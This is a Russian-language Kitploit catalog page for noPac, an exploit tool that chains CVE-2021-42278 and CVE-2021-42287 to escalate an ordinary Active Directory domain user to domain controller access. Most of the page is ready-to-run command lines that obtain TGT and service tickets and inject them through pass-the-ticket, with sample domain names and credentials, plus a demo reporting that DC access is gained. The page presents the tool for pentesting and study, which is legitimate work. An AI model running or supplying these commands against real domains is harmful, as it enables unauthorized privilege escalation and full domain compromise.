Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
noPac — CVE-2021-42287/CVE-2021-42278 Exploiter | Kitploit
Инструменты/GitHubGitHub/trya9ain/nopac
Аутентификация и авторизацияПовышение привилегийАнализ уязвимостейЭксплуатацияТестирование на Проникновение
GitHubtrya9ain/nopac

noPac

CVE-2021-42287/CVE-2021-42278 Exploiter

Репозиторий
14183 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

noPac

Этот проект возник из изучения принципов noPac. На основе проекта cube0x0 были внесены некоторые изменения. В исходный код добавлены комментарии с личным пониманием.

  • Удалена функция Scan, так как я считаю её не очень полезной.
  • Добавлена проверка значения MachineAccountQuota — если оно равно 0, программа завершает работу.
  • Оптимизирована обработка при добавлении учётной записи компьютера.
  • Добавлен вывод TGT.

Анализ уязвимости можно посмотреть в моей статье в блоге: Анализ noPac

Условия эксплуатации

noPac — это комбинация двух уязвимостей: CVE-2021-42278 (подмена sAMAccountName) и CVE-2021-42287 (обман KDC). Успешная эксплуатация возможна только при одновременном выполнении условий обеих уязвимостей.

Использование

root@kitploit:~
Примеры: Получение TGT и ST

  noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei

  noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword /service altservice

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs

Примеры: PTT

  noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword /service altservice /ptt

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

Более распространённый метод — PTT:

root@kitploit:~
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

Демонстрация

До использования noPac нет доступа к DC.

Использование noPac.

root@kitploit:~
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

После PTT, снова перейдя в текущее окно, можно успешно получить доступ к DC.

Среда эксплуатации

Обратите внимание: программа может работать только на машинах с .NET 4.0+; Windows Server 2012 по умолчанию имеет .NET 4.0, Windows Server 2008 — .NET 3.5.

Проверить версию .NET на машине:

root@kitploit:~
dir c:\Windows\Microsoft.NET\Framework64

Скачать инструмент